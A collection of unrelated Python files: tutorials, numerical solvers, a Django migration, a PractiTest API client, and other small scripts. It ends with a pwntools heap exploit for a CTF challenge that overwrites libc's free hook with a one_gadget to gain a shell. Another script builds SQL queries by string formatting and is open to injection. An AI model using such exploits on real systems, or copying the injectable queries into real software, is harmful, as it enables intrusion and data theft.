:param category: Category name
:param image: Image name
:return: Nothing
"""
if os.path.isfile(os.path.join(self.categories_director, category, image)):
os.remove(os.path.join(self.categories_director, category, image))
else:
raise FileNotFoundError
def save(self, image, category):
"""
Add new image to the given category. If the given image's name already exists the image is overwritten.
:param image: Image absolute path
:param category: Category name
:return: Nothing
"""
shutil.copy(image, self.categories_director + '/' + category)
def generate_targets(self, number_of_classes=True):
"""
Generate targets in the same order of the get_all().
:param number_of_classes: True (default) if the must be only two classes. True if there is a class for each category.
:return: List of classes (if number_of_classes is True the list contain another list of reach category)
"""
targets = []
if number_of_classes:
for cat in self.get_categories():
classes = []
for c in self.get_categories():
if c != cat:
classes += [1] * len(self.get_by_category(c))
else:
classes += [0] * len(self.get_by_category(c))
targets.append(classes)
else:
for count, cat in enumerate(self.get_categories()):
targets.extend([count] * len(self.get_by_category(cat)))
return targets
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 16 16:33:02 2019
@author: chakra
"""
#A set is a collection which is unordered and unindexed.
#In Python sets are written with curly brackets.
thisset = {"apple", "banana", "cherry"}
print(thisset)
#sets are unordered so that you wont know what ordered it will be displayed
#you cant access item with index since sets are unordered
#use for loop with in to access the items
for x in thisset:
print x;
#use if and in to check items in set
if "apple" in thisset:
print("apple in set")
else:
print("NO APPLE")
#or you can check with this too
print("banana" in thisset) #will display bollean
#once the SET is created you cannot change the items, but you can add new items.
#to add one items in the set, use add() methods.
#to add more than one method use uodate() methods.
thisset.add("mango")
print(thisset)
#multiple use upadte() and use ([elements here, elementshere])
thisset.update(["kiwi","avacoda","orange"])
print(thisset)
#get the length of the set use len() method
print(len(thisset))
#remove items
#To remove an item in a set, use the remove(), or the discard() method.
thisset.remove("kiwi")
print(thisset)
#if the item to remove doesnot exist, remove() will display error message, so use discard()
thisset.discard("apple")
print(thisset)
#pop items remove any items, cant declare index since its unordered.
#the returntype is the items thats deleted from the list
x=thisset.pop()
print(x)
#clear() method is used to clean all items from the list, when cleared empty [] sets will be displayed
theset = {"apple", "banana", "cherry"}
theset.clear()
print(theset)
#tset = {"apple", "banana", "cherry"}
#del tset
#print(tset)
#Join Two Sets
#there are several ways to join two or more sets in Python.
#You can use the union() method that returns a new set containing all items-
# from both sets, or the update() method that inserts all the items from one set into another:
#The union() method returns a new set with all items from both sets:
set1 = {"a", "b" , "c"}
set2 = {1, 2, 3}
set3 = set1.union(set2)
print(set3)
#The update() method inserts the items in set2 into set1:
set1 = {"a", "b" , "c"}
set2 = {1, 2, 3}
set1.update(set2)
print(set1)
#The set() Constructor
#It is also possible to use the set() constructor to make a set.
#Using the set() constructor to make a set:
thisset = set(("apple", "banana", "cherry")) # note the double round-brackets
print(thisset)
#-----------------------------------------------------------------------------------------------
'''Set Methods
Python has a set of built-in methods that you can use on sets.
Method Description
add() Adds an element to the set
clear() Removes all the elements from the set
copy() Returns a copy of the set
difference() Returns a set containing the difference between two or more sets
difference_update() Removes the items in this set that are also included in another, specified set
discard() Remove the specified item
intersection() Returns a set, that is the intersection of two other sets
intersection_update() Removes the items in this set that are not present in other, specified set(s)
isdisjoint() Returns whether two sets have a intersection or not
issubset() Returns whether another set contains this set or not
issuperset() Returns whether this set contains another set or not
pop() Removes an element from the set
remove() Removes the specified element
symmetric_difference() Returns a set with the symmetric differences of two sets
symmetric_difference_update() inserts the symmetric differences from this set and another
union() Return a set containing the union of sets
update() Update the set with the union of this set and others'''
|
import dex2
import sys
import signal
interrupted = False
def signal_handler(signal, frame):
global interrupted
interrupted = True
def interrupt_callback():
global interrupted
return interrupted
#Specify the model obtained from Snowboy website
if len(sys.argv) == 1:
print("MODEL NOT SPECIFIED")
print("Please specify model with .pmdl or .umdl extension after python file")
sys.exit(-1)
model = sys.argv[1]
#To capture signal such as keyboard interrupt
signal.signal(signal.SIGINT, signal_handler)
#Here higher sensitivity means lower detection chances but more accuracy
detector = dex2.HotwordDetector(model, sensitivity=0.5)
print('Speak a keyword(computer) to initialize')
#In every 0.03 seconds program checks for the hotword
detector.start(detected_callback=dex2.perform,
interrupt_check=interrupt_callback,
sleep_time=0.03)
detector.terminate()
|
import sqlite3
from datetime import date, timedelta
database = "C:\Program Files\lonchepos1.1.0_w10\database.db"
connection = sqlite3.connect(database)
cursor = connection.cursor()
def fetchData(folio):
query = "SELECT total, hora, nombre, notas FROM tickets WHERE folio = '{}';".format(folio)
cursor.execute(query)
ticket = cursor.fetchall()[0]
query = "SELECT producto, cantidad FROM ticketProducts WHERE folio = '{}';".format(folio)
cursor.execute(query)
ticketProducts = cursor.fetchall()
return [ticket, ticketProducts]
while True:
folio = input("ESCRIBE EL FOLIO QUE QUIERES CHECAR: ")
data = fetchData(folio)
print("FOLIO: {}".format(folio))
print("TOTAL: {}".format(data[0][0]))
print("HORA: {}".format(data[0][1]))
print("")
print("NOMBRE: {}".format(data[0][2]))
print("NOTAS: {}".format(data[0][3]))
print("")
print("PRODUCTOS: ")
for i in range(len(data[1])):
print(data[1][i])
print("________________________________________")
|
#!/usr/bin/env python
import sys
import os
from flavorite import Recommender
from combosaurus import load_data
from datetime import datetime
def find_closest_demo():
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings_small.tsv')
item_data = data['item_data']
recom = Recommender()
recom.build(item_data)
return recom.find_closest('doctor-who', 10)
def save_load_demo():
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings_small.tsv')
item_data = data['item_data']
recom = Recommender()
recom.build(item_data)
print 'Saving to `recom.pkl`...'
recom.save('recom.pkl')
recom2 = Recommender()
print 'Loading back...'
recom2.load('recom.pkl')
os.remove('recom.pkl')
print 'Done.'
def load_sim_demo():
recom = Recommender()
recom.load('recom.pkl')
print recom.similarity('doctor-who', 'torchwood')
def build_and_save(filename):
print '[', datetime.now(), '] loading data...'
data = load_data('../data/dump_interests.tsv',
'../data/dump_ratings.tsv')
print '[', datetime.now(), '] forcing item data to be loaded...'
item_data = list(data['item_data'])
print '[', datetime.now(), '] building recommender...'
recom = Recommender()
recom.build(item_data)
recom.save(filename)
print 'Done.'
if __name__ == '__main__':
if len(sys.argv) > 1:
cmd = sys.argv[1]
if cmd == 'build_and_save':
build_and_save(sys.argv[2])
elif cmd == 'find_closest':
find_closest_demo()
elif cmd == 'save_load':
save_load_demo()
elif cmd == 'load_sim':
load_sim_demo()
else:
print 'No such command'
else:
print 'Usage: python demo.py cmd [args]'
|
import numpy as np
#perform an expilicit march using euler approximation
def eulerstep(input,grid,t,f,delta):
new=[]
#get shape of input
row,col=input[0].shape
#create a new array to contain the new time step
for i in range(0,len(input)):
array=np.zeros([row,col],float)
new.append(array)
#for each element in the newarrays we need a value at x,y
#or i j in matrix notation
for i in range(0,row):
for j in range(0,col):
n=0
X=[i,j]
for matrix in new:
matrix[i,j]=f[n](X,grid,input,delta)
n+=1
return new
def eulerstep1d(input,grid,t,f,delta):
new=[]
#get shape of input
row=len(input[0])
#create a new array to contain the new time step
for i in range(0,len(input)):
array=np.zeros([row],float)
new.append(array)
#for each element in the newarrays we need a value at x,y
#or i j in matrix notation
for i in range(0,row):
n=0
X=[i]
for matrix in new:
matrix[i]=f[n](X,grid,input,delta)
n+=1
return new
def multipdesys1D(Lm,grid,f,a,b,dt):
t=[]
#find the difference in the grid in the x and y direction
dx=abs(grid[0][0]-grid[0][1])
#creates a list of deltas so we can easily call dt,dx, and dy
delta=[dt,dx]
#create a dictionary that will contain
# a list of arrays for each variable in the odesolversystem
#for example if we had a coupled system u and v
# X contain two list one for u and one for v
# each element in these lists is a matrix containing all the x,y positions
#where the last element in the list corresponds to the final time step
X=dict()
#create a index for number of coupled systems
n=len(Lm)
for i in range(0,n):
#create a key for each system in the coupled system
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
#add to t list which is the list of time steps
t.append(a)
input=[]
new=[]
#pulls the last time step from each list in the dictionary
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
#performs euler step and returns a matrix for each
#variable in the coupled system
new=eulerstep1d(input,grid,t[-1],f,delta)
i=0
#for every list in x we append the new time marhc
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
# X will be a dictionary of lists each list will contain arrays corresponding
# to the 2d grid that progressed in time
return X,t
#solve a pde system in 2 dimensions
def multipdesys2dEE(Lm,grid,f,a,b,dt):
t=[]
#find the difference in the grid in the x and y direction
dx=abs(grid[0][0,0]-grid[0][1,0])
dy=abs(grid[1][0,0]-grid[1][0,1])
#creates a list of deltas so we can easily call dt,dx, and dy
delta=[dt,dx,dy]
#create a dictionary that will contain
# a list of arrays for each variable in the odesolversystem
#for example if we had a coupled system u and v
# X contain two list one for u and one for v
# each element in these lists is a matrix containing all the x,y positions
#where the last element in the list corresponds to the final time step
X=dict()
#create a index for number of coupled systems
n=len(Lm)
for i in range(0,n):
#create a key for each system in the coupled system
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
#add to t list which is the list of time steps
t.append(a)
input=[]
new=[]
#pulls the last time step from each list in the dictionary
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
#performs euler step and returns a matrix for each
#variable in the coupled system
new=eulerstep(input,grid,t[-1],f,delta)
i=0
#for every list in x we append the new time marhc
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
# X will be a dictionary of lists each list will contain arrays corresponding
# to the 2d grid that progressed in time
return X,t
#a is the lower diagnol
#b is the diagnol
#c is the upper diagnol
#d are the constants being dolved for
def TDMAsolver(a, b, c, d):
'''
TDMA solver, a b c d can be NumPy array type or Python list type.
refer to http://en.wikipedia.org/wiki/Tridiagonal_matrix_algorithm
and to http://www.cfd-online.com/Wiki/Tridiagonal_matrix_algorithm_-_TDMA_(Thomas_algorithm)
'''
nf = len(d) # number of equations
ac, bc, cc, dc = map(np.array, (a, b, c, d)) # copy arrays
for it in range(1, nf):
mc = ac[it-1]/bc[it-1]
bc[it] = bc[it] - mc*cc[it-1]
dc[it] = dc[it] - mc*dc[it-1]
xc = bc
xc[-1] = dc[-1]/bc[-1]
for il in range(nf-2, -1, -1):
xc[il] = (dc[il]-cc[il]*xc[il+1])/bc[il]
return xc
def implicithelp(input,grid,t,f,fI,delta):
row,col=input[0].shape
dmatrix=[]
for i in range(0,len(input)):
array=np.zeros([row,col],float)
dmatrix.append(array)
for i in range(0,row):
for j in range(0,col):
n=0
X=[i,j]
for matrix in dmatrix:
matrix[i,j]=f[n](X,grid,input,delta)
n+=1
return dmatrix
def diag(input,grid,delta,f):
row,col=input[0].shape
A=[]
B=[]
C=[]
i=0
for matrix in input:
a,b,c=f[i](row,grid,delta)
a=np.array(a)
b=np.array(b)
c=np.array(c)
A.append(a)
B.append(b)
C.append(c)
i+=1
return [A,B,C]
def impliciteulerstepT(input,grid,t,f,g,fIx,fIy,delta,flip):
new=[]
#create a tridiagnol matrix for for x march and y march
#a is the lower diagnol
#b is the diagnol
#c is the upper diagnol
ax,bx,cx=diag(input,grid,[delta[0],delta[1]],fIx)
ay,by,cy=diag(input,grid,[delta[0],delta[2]],fIy)
row,col=input[0].shape
#we create an array of zeros to fill with new information
for i in range(0,len(input)):
array=np.zeros([row,col],float)
new.append(array)
#check in which order to perform the explicit and implicit march
if(flip%2!=0):
dmatrix1=implicithelp(input,grid,t,f,fIy,delta)
for j in range(0,col):
n=0
for matrix in new:
ans=TDMAsolver(ax[n],bx[n],cx[n],dmatrix1[n][:,j])
matrix[:,j]=ans
n+=1
dmatrix2=implicithelp(new,grid,t,g,fIx,delta)
for i in range(0,row):
n=0
for matrix in new:
ans=TDMAsolver(ay[n],by[n],cy[n],dmatrix2[n][i,:])
matrix[i,:]=ans
n+=1
return new
#check in which order to perform the explicit and implicit march
else:
dmatrix1=implicithelp(input,grid,t,g,fIx,delta)
for i in range(0,row):
n=0
for matrix in new:
ans=TDMAsolver(ay[n],by[n],cy[n],dmatrix1[n][i,:])
matrix[i,:]=ans
n+=1
dmatrix2=implicithelp(new,grid,t,f,fIy,delta)
for j in range(0,col):
n=0
for matrix in new:
ans=TDMAsolver(ax[n],bx[n],cx[n],dmatrix2[n][:,j])
matrix[:,j]=ans
n+=1
return new
#f is the right hand side when going in the x direction in adi
#g is the right hand side when going in the y direction in adi
#fIx is the diagnol or left hand side when going in the x direction
#fIy is the diagnol or left hand side going in the y direction
def multipdesys2dIET(Lm,grid,f,g,fIx,fIy,a,b,dt):
t=[]
flip=0
#find the difference in the grid in the x and y direction
dx=abs(grid[0][0,0]-grid[0][1,0])
dy=abs(grid[1][0,0]-grid[1][0,1])
delta=[dt/2,dx,dy]
X=dict()
n=len(Lm)
for i in range(0,n):
key=str(i)
X[key]=[Lm[i]]
check=0
while a<b:
flip+=1
t.append(a)
input=[]
new=[]
for list in X:
#this creates the array that is fed into the Euler system algorithm
input.append(X[list][-1])
new=impliciteulerstepT(input,grid,t[-1],f,g,fIx,fIy,delta,flip)
if(check==0):
print("this is n ="+ str(check))
print(input)
if(check>10 and check<20 ):
print("this is n ="+ str(check))
print(new)
i=0
for list in X:
#appends the output to the list
X[list].append(new[i])
i=i+1
a=a+dt
check+=1
return X,t
|
# Generated by Django 3.1.5 on 2021-01-07 13:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Maker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='メーカー')),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='機種')),
('release_date', models.DateField(verbose_name='発売日')),
('maker', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stock_manager.maker', verbose_name='メーカー')),
],
),
migrations.CreateModel(
name='SmartPhone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('storage', models.IntegerField(verbose_name='データ容量(GB)')),
('color', models.TextField(verbose_name='色')),
('product', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='smartphone', to='stock_manager.product', verbose_name='機種')),
],
),
migrations.CreateModel(
name='Stock',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.TextField(verbose_name='OSバージョン')),
('price', models.IntegerField(verbose_name='販売価格(円)')),
('prd', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stock', to='stock_manager.smartphone', verbose_name='機種')),
],
),
]
|
from base64 import b64encode
import base64
from collections import OrderedDict
import json, csv, sys, os
from re import split
import re, requests
from localSettings import *
from logger import *
from utilityTestFunc import *
#=============================================================================================================
# The class contains functions that manage PraciTest integration with automation framework
#=============================================================================================================
class clsPractiTest:
#=============================================================================================================
# Function that returns all instances of a specific session
#=============================================================================================================
def getPractiTestSessionInstances(self, prSessionInfo):
prSessionID = prSessionInfo["sessionSystemID"]
defaultPlatform = prSessionInfo["setPlatform"]
runOnlyFailed = prSessionInfo["runOnlyFailed"].lower()
sessionInstancesDct = {}
page = 1
while True:
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances.json?set-ids=" + str(prSessionID) + "&developer_email=" + LOCAL_SETTINGS_DEVELOPER_EMAIL + "&page[number]=" + str(page) + "&api_token=" + LOCAL_SETTINGS_PRACTITEST_API_TOKEN
# For next iteration
page = page + 1
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if (len(dctSets["data"]) > 0):
for testInstance in dctSets["data"]:
# '---f-34162' = 'Execute Automated'
# testInstance['attributes']['custom-fields']['---f-30772'] - Platform(CH, FF..)
# Check if test has specified platform, if not, use default platform
try:
platform = testInstance['attributes']['custom-fields']['---f-30772']
except Exception:
platform = defaultPlatform
try:
executeAutomated = testInstance['attributes']['custom-fields']['---f-34162']
except Exception:
executeAutomated = 'No'
# Run only FAILED tests:
toRun = True
if runOnlyFailed == 'yes':
if not testInstance['attributes']['run-status'].lower() == 'failed':
toRun = False
if executeAutomated == 'Yes' and toRun == True:
sessionInstancesDct[testInstance["attributes"]["test-display-id"]] = testInstance["id"] + ";" + platform
writeToLog("INFO","Found test with id: " + str(testInstance["attributes"]["test-display-id"]))
else:
writeToLog("INFO","No instances in set. " + r.text)
break
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
break
return sessionInstancesDct
#=============================================================================================================
# Function that returns all sessions that are located under the filter "pending for automation"
#=============================================================================================================
def getPractiTestAutomationSession(self):
#FOR DEBUG, DON'T REMOVE
# PractiTest filter ID:
# qaKmsFrontEnd = 326139
filterId = os.getenv('PRACTITEST_FILTER_ID',"")
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets.json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL) + "&filter-id=" + str(filterId)
prSessionInfo = {
"sessionSystemID" : -1,
"sessionDisplayID" : -1,
"setPlatform" : "",
"environment" : "",
"hostname" : "",
"runOnlyFailed" : ""
}
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
if (dctSets["data"][0]["attributes"]["instances-count"] > 0):
prSessionInfo["sessionSystemID"] = dctSets["data"][0]["id"]
prSessionInfo["sessionDisplayID"] = dctSets["data"][0]["attributes"]["display-id"]
prSessionInfo["setPlatform"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-30772'] #PractiTest Field: Automation Platform
prSessionInfo["environment"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-30761'] #PractiTest Field: Automation Env
prSessionInfo["hostname"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-34785'] #PractiTest Field: Run On Hostname
prSessionInfo["runOnlyFailed"] = dctSets["data"][0]["attributes"]["custom-fields"]['---f-38033'] #PractiTest Field: Automation Run Only FAILED
writeToLog("INFO","Automation set found: " + str(prSessionInfo["sessionDisplayID"]) + " on platform: " + prSessionInfo["setPlatform"])
else:
writeToLog("INFO","No automated sessions found.")
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return prSessionInfo
#=============================================================================================================
# Function that returns specific test set by ID
#=============================================================================================================
def getPractiTestSetById(self, testSetId):
# testSetId = '367544'
page = '1'
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances.json?set-ids=" + str(testSetId) + "&developer_email=" + LOCAL_SETTINGS_DEVELOPER_EMAIL + "&page[number]=" + str(page) + "&api_token=" + LOCAL_SETTINGS_PRACTITEST_API_TOKEN
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
writeToLog("INFO","Automation Test Set found, id: '" + str(testSetId)+ "'; Display ID: '" + str(dctSets["data"][0]["attributes"]["set-display-id"]) + "'")
return dctSets["data"]
else:
writeToLog("INFO","No test found in Test Set: '" + str(testSetId) + "'")
else:
writeToLog("INFO","Bad response for get PractiTest Set By Id: " + r.text)
return
#=============================================================================================================
# Function go over data (all tests in test set)
# practiTestFieldId - example: "---f-38302"
#=============================================================================================================
def syncTestSetData(self, testSet, csvPath, practiTestFieldId):
listCsv = open(csvPath).readlines()
testSetData = self.getPractiTestSetById(testSet['id'])
for testPractitest in testSetData:
testDisplayId = str(testPractitest["attributes"]["test-display-id"])
for testCsv in listCsv:
if testDisplayId == testCsv.split(',')[0]:
if str(testCsv.split(',')[1]) != '\n':
#Update the test: instanceId, customFieldId, customFieldValue
self.updateInstanceCustomField(str(testPractitest['id']), practiTestFieldId, str(testCsv.split(',')[1]).replace('\n',''))
writeToLog("INFO", "Updated TestSet '" + str(testSet['id']) + "', Test ID '" + testDisplayId + "', Filed ID '" + practiTestFieldId + "', New Value: " + str(testCsv.split(',')[1]))
return
#=============================================================================================================
# Function that returns all tests sets that are located under the given filter
#=============================================================================================================
def getPractiTestTestSetByFilterId(self, filterId):
practiTestGetSessionsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets.json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL) + "&filter-id=" + str(filterId)
listTestSet = []
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
r = requests.get(practiTestGetSessionsURL,headers = headers)
if (r.status_code == 200):
dctSets = json.loads(r.text)
if len(dctSets["data"]) != 0:
for testSet in dctSets["data"]:
listTestSet.append(testSet)
else:
writeToLog("INFO","No Test Sets found under filter id: '" + filterId + "'")
else:
writeToLog("INFO","Bad response for get Test Set: " + r.text)
return listTestSet
#=============================================================================================================
# Function that retrieves the test Instance of a specific test in the csv file that contains the test list
#=============================================================================================================
def getTestInstanceFromTestSetFile(self, testID):
instance = ""
case_str = "test_" + testID
testSetFilePath = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testSetAuto.csv'))
with open(testSetFilePath, 'r') as csv_mat: #windows
platform_matrix = csv.DictReader(csv_mat)
for row in platform_matrix:
if (row['case'] == case_str):
instance = row['instanceID']
break
return instance
#=============================================================================================================
# Function that update the test results of a specific test run in practitest
#=============================================================================================================
def setPractitestInstanceTestResults(self,testStatus,testID):
runningTestNum = os.getenv('RUNNING_TEST_ID',"")
TEST_LOG_FILE_FOLDER_PATH = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'logs',str(runningTestNum)))
practiTestUpdateTestInstanceResultsURL = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/runs.json"
if (testStatus == "Pass"):
exit_code = "0"
else:
exit_code = "1"
# upload test results with a file attachment
fileList = self.getFilesInTestLogFolder(TEST_LOG_FILE_FOLDER_PATH)
instance = self.getTestInstanceFromTestSetFile(testID)
data_json = json.dumps({'data':{'type': 'instances','attributes': {'instance-id': instance, 'exit-code': exit_code}, "files": {"data": fileList} } })
r = requests.post(practiTestUpdateTestInstanceResultsURL,
data=data_json,
auth=(LOCAL_SETTINGS_DEVELOPER_EMAIL, str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN)),
headers={'Content-type': 'application/json', 'Connection':'close'})
if (r.status_code == 200):
writeToLog("INFO","Updated test: " + testID + " as: " + testStatus)
return True
else:
writeToLog("INFO","Bad response for update instances. " + r.text)
return False
#=============================================================================================================
# Function that that creates the csv that contains the automation tests to be run
#=============================================================================================================
def createAutomationTestSetFile(self, hostname, environment, platform, testIDsDict):
platformList = ["pc_firefox","pc_chrome","pc_internet explorer","android_chrome"]
testSetFile = os.path.abspath(os.path.join(localSettings.LOCAL_SETTINGS_KMS_WEB_DIR,'ini','testSetAuto.csv'))
automationTestSetFileHeader = "hostname,environment,case"
for plat in platformList:
automationTestSetFileHeader = automationTestSetFileHeader + "," + plat
automationTestSetFileHeader = automationTestSetFileHeader + ",instanceID\n"
file = open(testSetFile, "w")
file.write (automationTestSetFileHeader)
for testID in testIDsDict:
sTestID = str(testID)
sTestPlatform = str(testIDsDict[testID]).split(";")[1]
if sTestPlatform != '':
platform = sTestPlatform
testPlatformLine = hostname + "," + environment + ",test_" + sTestID
for plat in platformList:
if plat == platform:
testPlatformLine = testPlatformLine + ",1"
writeToLog("INFO","Adding: " + "test_" + sTestID + " for platform: " + plat)
else:
testPlatformLine = testPlatformLine + ",0"
testPlatformLine = testPlatformLine + "," + str(testIDsDict[testID]).split(";")[0]
file.write (testPlatformLine + "\n")
file.close()
#=============================================================================================================
# Function that that set the test set from status pending to status processed in practitest
#=============================================================================================================
def setTestSetAutomationStatusAsProcessed (self, prSessionID):
practiTestSetAutomationStatusAsProcessedUrl = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/sets/" + str(prSessionID) + ".json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL)
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
data = {"data": { "type": "sets", "attributes": {"custom-fields": { "---f-30327": "Processed"}} } }
r = requests.put(practiTestSetAutomationStatusAsProcessedUrl,headers = headers, data = json.dumps(data))
if (r.status_code == 200):
writeToLog("INFO","Session: " + str(prSessionID) + " updated as processed")
return True
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return False
#=============================================================================================================
# Function that sets the test custom field
# customFiledId example: "---f-38302"
#=============================================================================================================
def updateInstanceCustomField(self, instanceId, customFieldId, customFieldValue):
practiTestSetAutomationStatusAsProcessedUrl = "https://api.practitest.com/api/v2/projects/" + str(LOCAL_SETTINGS_PRACTITEST_PROJECT_ID) + "/instances/" + str(instanceId) + ".json?" + "api_token=" + str(LOCAL_SETTINGS_PRACTITEST_API_TOKEN) + "&developer_email=" + str(LOCAL_SETTINGS_DEVELOPER_EMAIL)
headers = {
'Content-Type': 'application/json',
'Connection':'close'
}
data = {"data": { "type": "instances", "attributes": {"custom-fields": { customFieldId: str(customFieldValue)}}}}
r = requests.put(practiTestSetAutomationStatusAsProcessedUrl,headers = headers, data = json.dumps(data))
if (r.status_code == 200):
return True
else:
writeToLog("INFO","Bad response for get sessions. " + r.text)
return False
#=============================================================================================================
# Function that gets all the file names in a given folder
#=============================================================================================================
def getFilesInTestLogFolder(self,path):
# Check on which platform we run
if 'win' in sys.platform:
delimiter = "\\"
else:
delimiter = "/"
files = []
fileList = os.listdir(path)
for file in fileList:
with open(os.path.abspath(os.path.join(path,file)), "rb") as fileObj:
fileBase64Utf8 = base64.b64encode(fileObj.read()).decode('utf-8')
files.append({"filename": self.getDateAndTime() + '__' + fileObj.name.split(delimiter)[len(fileObj.name.split(delimiter)) - 1], "content_encoded": fileBase64Utf8})
return files
#=============================================================================================================
# Return current date and time using strftime, for example: 21-02-2018_16:34
#=============================================================================================================
def getDateAndTime(self):
now = datetime.datetime.now()
return now.strftime("%d-%m-%Y_%H:%M")
|
import requests
import json
from pprint import pprint
# Gets user information
url1 = f"https://api.github.com/users?"
data = requests.get(url).json()
user_list = []
for i in data:
user_list.append(i['login'])
for i in user_list:
url = "https://api.github.com/users/{}/repos".format(i)
data = requests.get(url).json()
with open("User_Repos.json", "a") as outfile:
json.dump(data,outfile)
# Gets repos related to REST written in Java
url2 = f"https://api.github.com/search/repositories?q=language:Java&topic=REST"
data = requests.get(url).json()
f = open("Java_Rest.json", "w")
with open("Java_Rest.json", "a") as outfile:
json.dump(data,outfile)
|
#!/usr/bin/env python3
print("Name:Tyler Sperle")
slicingFile = open('slicing-file.txt', 'r')
listfiletext = slicingFile.readlines()
slicingFile.close()
A = listfiletext[24::3]
print(A)
B = listfiletext[2:5]
print(B)
C = listfiletext[12:-9][::-1][::2]
print(C)
D = listfiletext[10:-14]
print(D)
E = listfiletext[6:-18][::-1]
print(E)
quote = (A+B+C+D+E)
print("".join(quote))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Will create a new synthetic_cascades_thresholds.txt
"""
import pylab
num_cascades = 4
num_stages = 800
thresholds = [0]*num_stages
if False:
# 2011 cascade (CVPR submission time)
score_0 = -0.01
score_1250 = -0.03
score_2000 = -0.01
for i in range(num_stages):
if i < 1250:
t = ((score_1250 - score_0)*i/1250) + score_0
else:
t = ((score_2000 - score_1250)*(i - 1250)/(2000 - 1250)) + score_1250
thresholds[i] = t
else:
# 2012 cascade (ECCV workshop submission time)
from scipy.interpolate import interp1d as interpolate_1d
curve_samples_x = [0, 6, 11, 45, 60,
180, 370, 500, 1000, 1350, 1500, 1750, 2000]
curve_samples_y = [-0.002, -0.0078, -0.007, -0.011, -0.013,
-0.018, -0.02, -0.023, -0.0227, -0.0215, -0.0245, -0.0145, -0.006]
spline_order = 1
curve = interpolate_1d(curve_samples_x, curve_samples_y, kind=spline_order)
for i in range(num_stages):
thresholds[i] = curve(i)
data = [thresholds] * num_cascades
data = pylab.array(data)
filename = "synthetic_cascades_thresholds.txt"
pylab.savetxt(filename, data)
print "Created", filename
|
# encoding: utf-8
from tastypie.fields import *
|
from pwn import *
import time
import sys
def add(size):
proc.sendlineafter(b':', b'1')
proc.sendlineafter(b':', f'{size}'.encode())
def free(offset):
proc.sendlineafter(b':', b'2')
proc.sendlineafter(b':', f'{offset}'.encode())
def write(data):
proc.sendlineafter(b':', b'3')
proc.sendafter(b':', data)
def exploit():
if len(sys.argv) <= 1:
input('attach to pid: {}'.format(proc.proc.pid))
proc.recvuntil(b':P ')
printf = int(proc.recvline(), 16)
libc = printf - 0x62830
log.info('libc: ' + hex(libc))
free_hook = libc + 0x1e75a8
malloc_hook = libc + 0x1e4c30
one_gadget = libc + 0x106ef8
#one_gadget = libc + 0xe237f
#libc2program = libc + 0x1eb5e0
libc2program = libc + 0x1ef4e0
magic_hook = libc + 0x1e40a8
add(0x20d30)
free(0x20d40)
add(0x18)
write(p64(free_hook)[:6])
add(0x68)
add(0x68)
write(p64(one_gadget)[:6])
free(0)
return
if __name__ == '__main__':
context.arch = 'amd64'
connect = 'nc eof.ais3.org 10106'
connect = connect.split(' ')
